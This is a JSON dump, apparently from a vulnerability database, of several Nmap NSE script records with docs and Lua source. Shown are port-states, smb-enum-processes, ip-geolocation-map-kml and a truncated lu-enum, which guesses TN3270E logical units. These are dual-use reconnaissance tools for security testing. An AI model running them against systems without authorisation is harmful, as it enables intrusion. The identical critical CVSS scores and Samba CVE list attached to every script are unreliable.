not(status) ) then\n return false, err\n end\n\n local timeout = arg_timeout or 5\n local start = os.time()\n local result = {}\n repeat\n\n local status, response = helper:recv()\n if ( not(status) and response ~= \"TIMEOUT\" ) then\n break\n elseif ( status ) then\n local status, _, _, rhost = helper.socket:get_info()\n if ( response.header.opcode == xdmcp.OpCode.WILLING ) then\n result[rhost] = true\n else\n result[rhost] = false\n end\n end\n\n until( os.time() - start > timeout )\n\n local output = {}\n for ip, res in pairs(result) do\n if ( res ) then\n table.insert(output, (\"%s - Willing\"):format(ip))\n else\n table.insert(output, (\"%s - Unwilling\"):format(ip))\n 
end\n end\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:11", "description": "Prints a list of ports found in each state. \n\nNmap ordinarily summarizes \"uninteresting\" ports as \"Not shown: 94 closed ports, 4 filtered ports\" but users may want to know which ports were filtered vs which were closed. This script will expand these summaries into a list of ports and port ranges that were found in each state.\n\n## Example Usage \n \n \n nmap -sV --script=port-states <target>\n\n## Script Output \n \n \n Host script results:\n | port-states:\n | tcp:\n | open: 22,631\n | closed: 7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n | udp:\n | open|filtered: 68,631,5353\n |_ closed: 7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n \n\n## Requires \n\n * [table](<>)\n * [nmap](<../lib/nmap.html>)\n * 
[stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-16T21:41:46", "type": "nmap", "title": "port-states NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-11-16T21:41:46", "id": "NMAP:PORT-STATES.NSE", "href": "https://nmap.org/nsedoc/scripts/port-states.html", "sourceData": "local table = require \"table\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nPrints a list of ports found in each state.\n\nNmap ordinarily summarizes \"uninteresting\" ports as \"Not shown: 94 closed\nports, 4 filtered ports\" but users may want to know which ports were filtered\nvs which were closed. 
This script will expand these summaries into a list of\nports and port ranges that were found in each state.\n]]\n\n---\n-- @output\n-- Host script results:\n-- | port-states:\n-- | tcp:\n-- | open: 22,631\n-- | closed: 7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n-- | udp:\n-- | open|filtered: 68,631,5353\n-- |_ closed: 7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024\n--\n-- @xmloutput\n-- <table key=\"tcp\">\n-- <elem key=\"open\">22,631</elem>\n-- <elem 
key=\"closed\">7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024</elem>\n-- </table>\n-- <table key=\"udp\">\n-- <elem key=\"open|filtered\">68,631,5353</elem>\n-- <elem key=\"closed\">7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024</elem>\n-- </table>\n\nauthor = \"Daniel Miller\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"safe\" }\n\n-- the hostrule iterates over open ports for the host\nhostrule = function() return true end\n\nlocal states = {\n \"open\",\n \"open|filtered\",\n \"filtered\",\n \"unfiltered\",\n \"closed\",\n \"closed|filtered\"\n}\nlocal protos = {\n \"tcp\", \"udp\", \"sctp\"\n}\n\naction = function(host)\n local out = stdnse.output_table()\n for _, p in ipairs(protos) do\n local proto_out = stdnse.output_table()\n for _, s in ipairs(states) do\n local t = {}\n local port = nmap.get_ports(host, nil, p, s)\n while port do\n local rstart = 
port.number\n local prev\n repeat\n prev = port.number\n port = nmap.get_ports(host, port, p, s)\n if not port then break end\n until (port.number > prev + 1)\n if prev > rstart then\n t[#t+1] = (\"%d-%d\"):format(rstart, prev)\n else\n t[#t+1] = tostring(rstart)\n end\n end\n if #t > 0 then\n proto_out[s] = table.concat(t, \",\")\n end\n end\n if #proto_out > 0 then\n out[p] = proto_out\n end\n end\n if #out > 0 then\n return out\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:35", "description": "Pulls a list of processes from the remote server over SMB. This will determine all running processes, their process IDs, and their parent processes. It is done by querying the remote registry service, which is disabled by default on Vista; on all other Windows versions, it requires Administrator privileges. \n\nSince this requires administrator privileges, it isn't especially useful for a penetration tester, since they can effectively do the same thing with metasploit or other tools. It does, however, provide for a quick way to get process lists for a bunch of systems at the same time. \n\nWARNING: I have experienced crashes in `regsvc.exe` while making registry calls against a fully patched Windows 2000 system; I've fixed the issue that caused it, but there's no guarantee that it (or a similar vulnerability in the same code) won't show up again. Since the process automatically restarts, it doesn't negatively impact the system, besides showing a message box to the user.\n\n## Script Arguments \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script smb-enum-processes.nse -p445 <host>\n sudo nmap -sU -sS --script smb-enum-processes.nse -p U:137,T:139 <host>\n \n \n\n## Script Output \n \n \n Host script results:\n | smb-enum-processes:\n |_ |_ Idle, System, smss, csrss, winlogon, services, logon.scr, lsass, spoolsv, msdtc, VMwareService, svchost, alg, explorer, VMwareTray, VMwareUser, wmiprvse\n \n --\n Host script results:\n | smb-enum-processes:\n | `+-Idle\n | | `-System\n | | `-smss\n | | `+-csrss\n | | `-winlogon\n | | `+-services\n | | | `+-spoolsv\n | | | +-msdtc\n | | | +-VMwareService\n | | | +-svchost\n | | | `-alg\n | | +-logon.scr\n | | `-lsass\n | +-explorer\n | | `+-VMwareTray\n | | `-VMwareUser\n |_ `-wmiprvse\n \n --\n Host script results:\n | smb-enum-processes:\n | PID PPID Priority Threads Handles\n | ----- ----- -------- ------- -------\n | 0 0 0 1 0 `+-Idle\n | 4 0 8 49 395 | `-System\n | 252 4 11 3 19 | `-smss\n | 300 252 13 10 338 | `+-csrss\n | 324 252 13 18 513 | `-winlogon\n | 372 324 9 16 272 | `+-services\n | 872 372 8 12 121 | | `+-spoolsv\n | 896 372 8 13 151 | | +-msdtc\n | 1172 372 13 3 53 | | +-VMwareService\n | 1336 372 8 20 158 | | +-svchost\n | 1476 372 8 6 90 | | `-alg\n | 376 324 4 1 22 | +-logon.scr\n | 384 324 9 23 394 | `-lsass\n | 1720 1684 8 9 259 +-explorer\n | 1796 1720 8 1 42 | `+-VMwareTray\n | 1808 1720 8 1 44 | `-VMwareUser\n |_ 1992 580 8 7 179 `-wmiprvse\n \n\n## Requires \n\n * [msrpcperformance](<../lib/msrpcperformance.html>)\n * [nmap](<../lib/nmap.html>)\n * [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-12-24T00:53:01", "type": "nmap", "title": "smb-enum-processes NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SMB-ENUM-PROCESSES.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-enum-processes.html", "sourceData": "local msrpcperformance = require \"msrpcperformance\"\nlocal nmap = require \"nmap\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nPulls a list of processes from the remote server over SMB. This will determine\nall running processes, their process IDs, and their parent processes. It is done\nby querying the remote registry service, which is disabled by default on Vista;\non all other Windows versions, it requires Administrator privileges.\n\nSince this requires administrator privileges, it isn't especially useful for a\npenetration tester, since they can effectively do the same thing with metasploit\nor other tools. It does, however, provide for a quick way to get process lists\nfor a bunch of systems at the same time.\n\nWARNING: I have experienced crashes in <code>regsvc.exe</code> while making registry calls\nagainst a fully patched Windows 2000 system; I've fixed the issue that caused\nit, but there's no guarantee that it (or a similar vulnerability in the same code) won't\nshow up again. 
Since the process automatically restarts, it doesn't negatively\nimpact the system, besides showing a message box to the user.\n]]\n\n---\n-- @usage\n-- nmap --script smb-enum-processes.nse -p445 <host>\n-- sudo nmap -sU -sS --script smb-enum-processes.nse -p U:137,T:139 <host>\n--\n---\n-- @output\n-- Host script results:\n-- | smb-enum-processes:\n-- |_ |_ Idle, System, smss, csrss, winlogon, services, logon.scr, lsass, spoolsv, msdtc, VMwareService, svchost, alg, explorer, VMwareTray, VMwareUser, wmiprvse\n--\n-- --\n-- Host script results:\n-- | smb-enum-processes:\n-- | `+-Idle\n-- | | `-System\n-- | | `-smss\n-- | | `+-csrss\n-- | | `-winlogon\n-- | | `+-services\n-- | | | `+-spoolsv\n-- | | | +-msdtc\n-- | | | +-VMwareService\n-- | | | +-svchost\n-- | | | `-alg\n-- | | +-logon.scr\n-- | | `-lsass\n-- | +-explorer\n-- | | `+-VMwareTray\n-- | | `-VMwareUser\n-- |_ `-wmiprvse\n--\n-- --\n-- Host script results:\n-- | smb-enum-processes:\n-- | PID PPID Priority Threads Handles\n-- | ----- ----- -------- ------- -------\n-- | 0 0 0 1 0 `+-Idle\n-- | 4 0 8 49 395 | `-System\n-- | 252 4 11 3 19 | `-smss\n-- | 300 252 13 10 338 | `+-csrss\n-- | 324 252 13 18 513 | `-winlogon\n-- | 372 324 9 16 272 | `+-services\n-- | 872 372 8 12 121 | | `+-spoolsv\n-- | 896 372 8 13 151 | | +-msdtc\n-- | 1172 372 13 3 53 | | +-VMwareService\n-- | 1336 372 8 20 158 | | +-svchost\n-- | 1476 372 8 6 90 | | `-alg\n-- | 376 324 4 1 22 | +-logon.scr\n-- | 384 324 9 23 394 | `-lsass\n-- | 1720 1684 8 9 259 +-explorer\n-- | 1796 1720 8 1 42 | `+-VMwareTray\n-- | 1808 1720 8 1 44 | `-VMwareUser\n-- |_ 1992 580 8 7 179 `-wmiprvse\n-----------------------------------------------------------------------\n\nauthor = \"Ron Bowes\"\ncopyright = \"Ron Bowes\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\ndependencies = {\"smb-brute\"}\n\n\nfunction psl_mode (list, i)\n local mode\n\n -- Decide connector for process.\n if #list 
== 1 then\n mode = \"only\"\n elseif i == 1 then\n mode = \"first\"\n elseif i < #list then\n mode = \"middle\"\n else\n mode = \"last\"\n end\n\n return mode\nend\n\nfunction psl_print (psl, lvl)\n -- Print out table header.\n local result = {}\n if lvl == 2 then\n result[#result+1] = \" PID PPID Priority Threads Handles\\n\"\n result[#result+1] = \"----- ----- -------- ------- -------\\n\"\n end\n\n -- Find how many root processes there are.\n local roots = {}\n for i, ps in pairs(psl) do\n if psl[ps.ppid] == nil or ps.ppid == ps.pid then\n table.insert(roots, i)\n end\n end\n table.sort(roots)\n\n -- Create vertical sibling bars.\n local bars = {}\n if #roots ~= 1 then\n table.insert(bars, 2)\n end\n\n -- Print out each root of the tree.\n for i, root in ipairs(roots) do\n local mode = psl_mode(roots, i)\n psl_tree(psl, root, 0, bars, mode, lvl, result)\n end\n\n return table.concat(result)\nend\n\nfunction psl_tree (psl, pid, column, bars, mode, lvl, result)\n local ps = psl[pid]\n\n -- Delete vertical sibling link.\n if mode == \"last\" then\n table.remove(bars)\n end\n\n -- Print information table.\n local info = \"\"\n if lvl == 2 then\n info = string.format(\"% 5d % 5d % 8d % 7d % 7d \", ps.pid, ps.ppid, ps.prio, ps.thrd, ps.hndl)\n end\n\n -- Print vertical sibling bars.\n local prefix = \"\"\n for i=1, #bars do\n prefix = prefix .. string.rep(\" \", bars[i] - 1) .. \"|\"\n end\n\n -- Strings used to separate processes from one another.\n local separators = {\n first = \"`+-\";\n last = \" `-\";\n middle = \" +-\";\n only = \"`-\";\n }\n\n -- Format process itself.\n result[#result+1] = \"\\n\" .. info .. prefix .. separators[mode] .. 
ps.name\n\n -- Find children of the process.\n local children = {}\n for child_pid, child in pairs(psl) do\n if child_pid ~= pid and child.ppid == pid then\n table.insert(children, child_pid)\n end\n end\n table.sort(children)\n\n -- Add vertical sibling link between children.\n column = column + #separators[mode]\n if #children > 1 then\n table.insert(bars, column + 2)\n end\n\n -- Format process's children.\n for i, pid in ipairs(children) do\n local mode = psl_mode(children, i)\n psl_tree(psl, pid, column, bars, mode, lvl, result)\n end\n\n return result\nend\n\nhostrule = function(host)\n return smb.get_port(host) ~= nil\nend\n\naction = function(host)\n -- Get the process list\n local status, result = msrpcperformance.get_performance_data(host, \"230\")\n if status == false then\n return stdnse.format_output(false, result)\n end\n\n -- Get the process table\n local process = result[\"Process\"]\n\n -- Put the processes into an array, and sort them by pid.\n local names = {}\n for i, v in pairs(process) do\n if i ~= \"_Total\" then\n names[#names + 1] = i\n end\n end\n table.sort(names, function (a, b) return process[a][\"ID Process\"] < process[b][\"ID Process\"] end)\n\n -- Put the processes into an array indexed by pid and with a value equal\n -- to the name (so we can look it up easily when we need to).\n local process_id = {}\n for i, v in pairs(process) do\n process_id[v[\"ID Process\"]] = i\n end\n\n -- Fill the process list table.\n --\n -- Used fields:\n -- Creating Process ID\n -- Handle Count\n -- ID Process\n -- Priority Base\n -- Thread Count\n --\n -- Unused fields:\n -- % Privileged Time\n -- % Processor Time\n -- % User Time\n -- Elapsed Time\n -- IO Data Bytes/sec\n -- IO Data Operations/sec\n -- IO Other Bytes/sec\n -- IO Other Operations/sec\n -- IO Read Bytes/sec\n -- IO Read Operations/sec\n -- IO Write Bytes/sec\n -- IO Write Operations/sec\n -- Page Faults/sec\n -- Page File Bytes\n -- Page File Bytes Peak\n -- Pool Nonpaged Bytes\n -- 
Pool Paged Bytes\n -- Private Bytes\n -- Virtual Bytes\n -- Virtual Bytes Peak\n -- Working Set\n -- Working Set Peak\n local psl = {}\n for i, name in ipairs(names) do\n if name ~= \"_Total\" then\n psl[process[name][\"ID Process\"]] = {\n name = name;\n pid = process[name][\"ID Process\"];\n ppid = process[name][\"Creating Process ID\"];\n prio = process[name][\"Priority Base\"];\n thrd = process[name][\"Thread Count\"];\n hndl = process[name][\"Handle Count\"];\n }\n end\n end\n\n -- Produce final output.\n local response\n if nmap.verbosity() == 0 then\n response = \"|_ \" .. table.concat(names, \", \")\n else\n response = \"\\n\" .. psl_print(psl, nmap.verbosity())\n end\n\n return response\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:39", "description": "This script queries the Nmap registry for the GPS coordinates of targets stored by previous geolocation scripts and produces a KML file of points representing the targets.\n\n### See also:\n\n * [ ip-geolocation-geoplugin.nse ](<../scripts/ip-geolocation-geoplugin.html>)\n * [ ip-geolocation-ipinfodb.nse ](<../scripts/ip-geolocation-ipinfodb.html>)\n * [ ip-geolocation-map-bing.nse ](<../scripts/ip-geolocation-map-bing.html>)\n * [ ip-geolocation-map-google.nse ](<../scripts/ip-geolocation-map-google.html>)\n * [ ip-geolocation-maxmind.nse ](<../scripts/ip-geolocation-maxmind.html>)\n\n## Script Arguments \n\n#### ip-geolocation-map-kml.map_path \n\n(REQUIRED) Path of the KML file to write. The file is opened for writing, so an existing file at that path is overwritten without warning.\n\n## Example Usage \n \n \n nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-kml --script-args ip-geolocation-map-kml.map_path=map.kml <target>\n \n\n## Script Output \n \n \n | ip-geolocation-map-kml:\n |_ The map has been saved at 'map.kml'.\n \n\n## Requires \n\n * [geoip](<../lib/geoip.html>)\n * [io](<>)\n * [oops](<../lib/oops.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-17T14:37:35", "type": "nmap", "title": "ip-geolocation-map-kml NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-09-20T04:40:20", "id": "NMAP:IP-GEOLOCATION-MAP-KML.NSE", "href": "https://nmap.org/nsedoc/scripts/ip-geolocation-map-kml.html", "sourceData": "local geoip = require \"geoip\"\nlocal io = require \"io\"\nlocal oops = require \"oops\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nThis script queries the Nmap registry for the GPS coordinates of targets stored\nby previous geolocation scripts and produces a KML file of points representing\nthe targets.\n]]\n\n---\n-- @usage\n-- nmap -sn -Pn --script ip-geolocation-geoplugin,ip-geolocation-map-kml --script-args ip-geolocation-map-kml.map_path=map.kml <target>\n--\n-- @output\n-- | ip-geolocation-map-kml:\n-- |_ The map has been saved at 'map.kml'.\n--\n-- @args ip-geolocation-map-kml.map_path (REQUIRED)\n--\n-- @see ip-geolocation-geoplugin.nse\n-- @see ip-geolocation-ipinfodb.nse\n-- @see ip-geolocation-map-bing.nse\n-- @see ip-geolocation-map-google.nse\n-- @see 
ip-geolocation-maxmind.nse\n\nauthor = \"Mak Kolybabi <mak@kolybabi.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\"}\n\nlocal render = function(path)\n local kml = {'<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n<kml xmlns=\"http://www.opengis.net/kml/2.2\">\\n <Document>'}\n\n for ip, coords in pairs(geoip.get_all_by_ip()) do\n table.insert(kml, ([[\n <Placemark>\n <name>%s</name>\n <Point>\n <coordinates>%s,%s</coordinates>\n </Point>\n </Placemark>]]):format(ip, coords[\"longitude\"], coords[\"latitude\"])\n )\n end\n\n table.insert(kml, ' </Document>\\n</kml>\\n')\n\n kml = table.concat(kml, \"\\n\")\n\n local f = io.open(path, \"w\")\n if not f then\n return false, (\"Failed to open file '%s'.\"):format(path)\n end\n\n if not f:write(kml) then\n return false, (\"Failed to write file '%s'.\"):format(path)\n end\n\n f:close()\n\n return true, (\"The map has been saved at '%s'.\"):format(path)\nend\n\nlocal parse_args = function()\n local map_path = stdnse.get_script_args(SCRIPT_NAME .. '.map_path')\n if not map_path then\n return false, \"Need to specify a path for the map.\"\n end\n\n return true, map_path\nend\n\npostrule = function()\n -- Only run if a previous script has registered geolocation data.\n return not geoip.empty()\nend\n\naction = function()\n -- Parse and sanity check the command line arguments.\n local status, path = oops.raise(\n \"Script argument problem\",\n parse_args())\n if not status then\n return path\n end\n\n -- Render the map.\n return oops.output(render(path))\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:03", "description": "Attempts to enumerate Logical Units (LU) of TN3270E servers. \n\nWhen connecting to a TN3270E server you are assigned a Logical Unit (LU) or you can tell the TN3270E server which LU you'd like to use. Typically TN3270E servers are configured to give you an LU from a pool of LUs. 
They can also have LUs set to take you to a specific application. This script attempts to guess valid LUs that bypass the default LUs you are assigned. For example, if a TN3270E server sends you straight to TPX you could use this script to find LUs that take you to TSO, CICS, etc.\n\n## Script Arguments \n\n#### lu-enum.path \n\nFolder used to store logical unit 'screenshots'. Defaults to `None` and doesn't store anything. The LU name and `.txt` are appended directly to this value with no separator inserted, so it must end with a trailing directory separator (e.g. `/home/dade/screenshots/`). Note that a screen is written for every LU that successfully negotiates a TN3270E session, before the script decides whether the LU is valid, so the folder may also contain screens of LUs reported as invalid.\n\n#### lulist \n\nPath to list of Logical Units to test, one per line; lines containing `#!comment:` are skipped. Defaults to the initial Logical Unit TN3270E provides, replacing the last two characters with `00-99`.\n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. 
\n\n## Example Usage \n\n * nmap --script lu-enum -p 23 <targets>\n \n\n * nmap --script lu-enum --script-args lulist=lus.txt,\n lu-enum.path=\"/home/dade/screenshots/\" -p 23 -sV <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON VERSION\n 23/tcp open tn3270 syn-ack IBM Telnet TN3270 (TN3270E)\n | lu-enum: \n | Logical Units: \n | LU:BSLVLU69 - Valid credentials\n |_ Statistics: Performed 7 guesses in 7 seconds, average tps: 1.0\n \n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [unpwdb](<../lib/unpwdb.html>)\n * [io](<>)\n * [nmap](<../lib/nmap.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-21T04:15:20", "type": "nmap", "title": "lu-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-03-21T04:15:20", "id": "NMAP:LU-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/lu-enum.html", 
"sourceData": "local stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal tn3270 = require \"tn3270\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal unpwdb = require \"unpwdb\"\nlocal io = require \"io\"\nlocal nmap = require \"nmap\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to enumerate Logical Units (LU) of TN3270E servers.\n\nWhen connecting to a TN3270E server you are assigned a Logical Unit (LU) or you can tell\nthe TN3270E server which LU you'd like to use. Typically TN3270E servers are configured to \ngive you an LU from a pool of LUs. They can also have LUs set to take you to a specific\napplication. This script attempts to guess valid LUs that bypass the default LUs you are\nassigned. For example, if a TN3270E server sends you straight to TPX you could use this\nscript to find LUs that take you to TSO, CICS, etc.\n]]\n\n---\n--@args lulist Path to list of Logical Units to test.\n-- Defaults the initial Logical Unit TN3270E provides, replacing the \n-- last two characters with <code>00-99</code>.\n--@args lu-enum.path Folder used to store valid logical unit 'screenshots'\n-- Defaults to <code>None</code> and doesn't store anything. 
